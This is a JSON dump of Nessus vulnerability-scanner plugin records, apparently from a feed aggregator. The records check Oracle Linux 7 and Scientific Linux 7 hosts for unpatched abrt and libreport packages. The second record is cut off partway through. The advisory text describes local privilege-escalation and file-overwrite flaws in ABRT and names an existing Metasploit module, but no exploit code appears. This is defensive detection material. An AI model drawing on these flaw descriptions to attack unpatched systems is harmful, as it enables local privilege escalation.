"cpe": ["p-cpe:/a:oracle:linux:abrt", "p-cpe:/a:oracle:linux:abrt-addon-ccpp", "p-cpe:/a:oracle:linux:abrt-addon-kerneloops", "p-cpe:/a:oracle:linux:abrt-addon-pstoreoops", "p-cpe:/a:oracle:linux:abrt-addon-python", "p-cpe:/a:oracle:linux:abrt-addon-upload-watch", "p-cpe:/a:oracle:linux:abrt-addon-vmcore", "p-cpe:/a:oracle:linux:abrt-addon-xorg", "p-cpe:/a:oracle:linux:abrt-cli", "p-cpe:/a:oracle:linux:abrt-console-notification", "p-cpe:/a:oracle:linux:abrt-dbus", "p-cpe:/a:oracle:linux:abrt-desktop", "p-cpe:/a:oracle:linux:abrt-devel", "p-cpe:/a:oracle:linux:abrt-gui", "p-cpe:/a:oracle:linux:abrt-gui-devel", "p-cpe:/a:oracle:linux:abrt-gui-libs", "p-cpe:/a:oracle:linux:abrt-libs", "p-cpe:/a:oracle:linux:abrt-python", "p-cpe:/a:oracle:linux:abrt-python-doc", "p-cpe:/a:oracle:linux:abrt-retrace-client", "p-cpe:/a:oracle:linux:abrt-tui", "p-cpe:/a:oracle:linux:libreport", "p-cpe:/a:oracle:linux:libreport-anaconda", "p-cpe:/a:oracle:linux:libreport-cli", "p-cpe:/a:oracle:linux:libreport-compat", "p-cpe:/a:oracle:linux:libreport-devel", "p-cpe:/a:oracle:linux:libreport-filesystem", "p-cpe:/a:oracle:linux:libreport-gtk", "p-cpe:/a:oracle:linux:libreport-gtk-devel", "p-cpe:/a:oracle:linux:libreport-newt", "p-cpe:/a:oracle:linux:libreport-plugin-bugzilla", "p-cpe:/a:oracle:linux:libreport-plugin-kerneloops", "p-cpe:/a:oracle:linux:libreport-plugin-logger", "p-cpe:/a:oracle:linux:libreport-plugin-mailx", "p-cpe:/a:oracle:linux:libreport-plugin-reportuploader", "p-cpe:/a:oracle:linux:libreport-plugin-ureport", "p-cpe:/a:oracle:linux:libreport-python", "p-cpe:/a:oracle:linux:libreport-rhel-anaconda-bugzilla", "p-cpe:/a:oracle:linux:libreport-rhel-bugzilla", "p-cpe:/a:oracle:linux:libreport-web", "p-cpe:/a:oracle:linux:libreport-web-devel", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-1083.NASL", "href": "https://www.tenable.com/plugins/nessus/84074", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1083 and \n# Oracle Linux Security Advisory ELSA-2015-1083 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84074);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3147\", \"CVE-2015-3150\", \"CVE-2015-3151\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_bugtraq_id(75116, 75117, 75118, 75119, 75122, 75124, 75128, 75129);\n script_xref(name:\"RHSA\", value:\"2015:1083\");\n\n script_name(english:\"Oracle Linux 7 : abrt (ELSA-2015-1083)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:1083 :\n\nUpdated abrt packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nABRT (Automatic Bug Reporting Tool) is a tool to help users to detect\ndefects in applications and to create a bug report with all the\ninformation needed by a maintainer to fix it. It uses a plug-in system\nto extend its functionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and\nsymbolic link flaws. A local attacker could use these flaws to\npotentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided\nby ABRT wrote core dumps to files owned by other system users. This\ncould result in information disclosure if an application crashed while\nits current directory was a directory writable to by other users (such\nas /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by\nABRT did not handle symbolic links correctly. A local attacker with\nwrite access to an ABRT problem directory could use this flaw to\nescalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy\nof an sosreport file in ABRT problem directories, and included\nexcerpts of /var/log/messages selected by the user-controlled process\nname, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain\ndirectories, abrt-handle-upload did not verify that the new problem\ndirectory had appropriate permissions and did not contain symbolic\nlinks. An attacker able to create a crafted problem report could use\nthis flaw to expose other parts of ABRT to attack, or to overwrite\narbitrary files on the system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus\nservice. A local attacker could use these flaws to read and write\narbitrary files as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly\ncheck the validity of the problem directory argument in the\nChownProblemDir, DeleteElement, and DeleteProblem methods. A local\nattacker could use this flaw to take ownership of arbitrary files and\ndirectories, or to delete files and directories as the root user.\n(CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache\nhelper program did not properly filter the process environment before\ninvoking abrt-action-install-debuginfo. A local attacker could use\nthis flaw to escalate their privileges on the system. (CVE-2015-3159)\n\nAll users of abrt are advised to upgrade to these updated packages,\nwhich correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-June/005106.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected abrt packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ABRT raceabrt Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-addon-ccpp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-addon-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-addon-pstoreoops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-addon-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-addon-upload-watch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-addon-vmcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-addon-xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-console-notification\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-gui-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-gui-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-python-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-retrace-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:abrt-tui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-anaconda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-gtk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-newt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-plugin-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-plugin-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-plugin-logger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-plugin-mailx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-plugin-reportuploader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-plugin-ureport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-rhel-anaconda-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-rhel-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libreport-web-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-addon-ccpp-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-addon-kerneloops-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-addon-pstoreoops-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-addon-python-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-addon-upload-watch-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-addon-vmcore-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-addon-xorg-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-cli-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-console-notification-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-dbus-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-desktop-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-devel-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-gui-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-gui-devel-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-gui-libs-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-libs-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-python-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-python-doc-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-retrace-client-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"abrt-tui-2.1.11-22.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-anaconda-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-cli-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-compat-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-devel-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-filesystem-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-gtk-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-gtk-devel-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-newt-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-plugin-bugzilla-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-plugin-kerneloops-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-plugin-logger-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-plugin-mailx-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-plugin-reportuploader-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-plugin-ureport-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-python-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-rhel-anaconda-bugzilla-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-rhel-bugzilla-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-web-2.1.11-23.0.1.el7_1\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libreport-web-devel-2.1.11-23.0.1.el7_1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"abrt / abrt-addon-ccpp / abrt-addon-kerneloops / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:57:15", "description": "It was found that ABRT was vulnerable to multiple race condition and symbolic link flaws. A local attacker could use these flaws to potentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by ABRT wrote core dumps to files owned by other system users. This could result in information disclosure if an application crashed while its current directory was a directory writable to by other users (such as /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT did not handle symbolic links correctly. A local attacker with write access to an ABRT problem directory could use this flaw to escalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an sosreport file in ABRT problem directories, and included excerpts of /var/log/messages selected by the user-controlled process name, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain directories, abrt-handle-upload did not verify that the new problem directory had appropriate permissions and did not contain symbolic links. An attacker able to create a crafted problem report could use this flaw to expose other parts of ABRT to attack, or to overwrite arbitrary files on the system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus service. A local attacker could use these flaws to read and write arbitrary files as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly check the validity of the problem directory argument in the ChownProblemDir, DeleteElement, and DeleteProblem methods. A local attacker could use this flaw to take ownership of arbitrary files and directories, or to delete files and directories as the root user.\n(CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache helper program did not properly filter the process environment before invoking abrt-action-install-debuginfo. A local attacker could use this flaw to escalate their privileges on the system. (CVE-2015-3159)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-06-11T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : abrt on SL7.x x86_64 (20150609)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:abrt", "p-cpe:/a:fermilab:scientific_linux:abrt-addon-ccpp", "p-cpe:/a:fermilab:scientific_linux:abrt-addon-kerneloops", "p-cpe:/a:fermilab:scientific_linux:abrt-addon-pstoreoops", "p-cpe:/a:fermilab:scientific_linux:abrt-addon-python", "p-cpe:/a:fermilab:scientific_linux:abrt-addon-upload-watch", "p-cpe:/a:fermilab:scientific_linux:abrt-addon-vmcore", "p-cpe:/a:fermilab:scientific_linux:abrt-addon-xorg", "p-cpe:/a:fermilab:scientific_linux:abrt-cli", "p-cpe:/a:fermilab:scientific_linux:abrt-console-notification", "p-cpe:/a:fermilab:scientific_linux:abrt-dbus", "p-cpe:/a:fermilab:scientific_linux:abrt-debuginfo", "p-cpe:/a:fermilab:scientific_linux:abrt-desktop", "p-cpe:/a:fermilab:scientific_linux:abrt-devel", "p-cpe:/a:fermilab:scientific_linux:abrt-gui", "p-cpe:/a:fermilab:scientific_linux:abrt-gui-devel", "p-cpe:/a:fermilab:scientific_linux:abrt-gui-libs", "p-cpe:/a:fermilab:scientific_linux:abrt-libs", "p-cpe:/a:fermilab:scientific_linux:abrt-python", "p-cpe:/a:fermilab:scientific_linux:abrt-python-doc", "p-cpe:/a:fermilab:scientific_linux:abrt-retrace-client", "p-cpe:/a:fermilab:scientific_linux:abrt-tui", "p-cpe:/a:fermilab:scientific_linux:libreport", "p-cpe:/a:fermilab:scientific_linux:libreport-anaconda", "p-cpe:/a:fermilab:scientific_linux:libreport-cli", "p-cpe:/a:fermilab:scientific_linux:libreport-compat", "p-cpe:/a:fermilab:scientific_linux:libreport-debuginfo", "p-cpe:/a:fermilab:scientific_linux:libreport-devel", "p-cpe:/a:fermilab:scientific_linux:libreport-filesystem", "p-cpe:/a:fermilab:scientific_linux:libreport-gtk", "p-cpe:/a:fermilab:scientific_linux:libreport-gtk-devel", "p-cpe:/a:fermilab:scientific_linux:libreport-newt", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-bugzilla", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-kerneloops", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-logger", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-mailx", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-reportuploader", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-rhtsupport", "p-cpe:/a:fermilab:scientific_linux:libreport-plugin-ureport", "p-cpe:/a:fermilab:scientific_linux:libreport-python", "p-cpe:/a:fermilab:scientific_linux:libreport-rhel", "p-cpe:/a:fermilab:scientific_linux:libreport-rhel-anaconda-bugzilla", "p-cpe:/a:fermilab:scientific_linux:libreport-rhel-bugzilla", "p-cpe:/a:fermilab:scientific_linux:libreport-web", "p-cpe:/a:fermilab:scientific_linux:libreport-web-devel", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150609_ABRT_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/84113", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84113);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3147\", \"CVE-2015-3150\", \"CVE-2015-3151\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n\n script_name(english:\"Scientific Linux Security Update : abrt on SL7.x x86_64 (20150609)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that ABRT was vulnerable to multiple race condition and\nsymbolic link flaws. A local attacker could use these flaws to\npotentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided\nby ABRT wrote core dumps to files owned by other system users. This\ncould result in information disclosure if an application crashed while\nits current directory was a directory writable to by other users (such\nas /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by\nABRT did not handle symbolic links correctly. A local attacker with\nwrite access to an ABRT problem directory could use this flaw to\nescalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy\nof an sosreport file in ABRT problem directories, and included\nexcerpts of /var/log/messages selected by the user-controlled process\nname, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain\ndirectories, abrt-handle-upload did not verify that the new problem\ndirectory had appropriate permissions and did not contain symbolic\nlinks. An attacker able to create a crafted problem report could use\nthis flaw to expose other parts of ABRT to attack, or to overwrite\narbitrary files on the system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus\nservice. A local attacker could use these flaws to read and write\narbitrary files as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly\ncheck the validity of the problem directory argument in the\nChownProblemDir, DeleteElement, and DeleteProblem methods. A local\nattacker could use this flaw to take ownership of arbitrary files and\ndirectories, or to delete files and directories as the root user.\n(CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache\nhelper program did not properly filter the process environment before\ninvoking abrt-action-install-debuginfo. A local attacker could use\nthis flaw to escalate their privileges on the system. (CVE-2015-3159)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1506&L=scientific-linux-errata&F=&S=&P=6189\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d9046b13\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ABRT raceabrt Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-addon-ccpp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-addon-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-addon-pstoreoops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-addon-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-addon-upload-watch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-addon-vmcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-addon-xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-console-notification\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:abrt-dbus\");\n 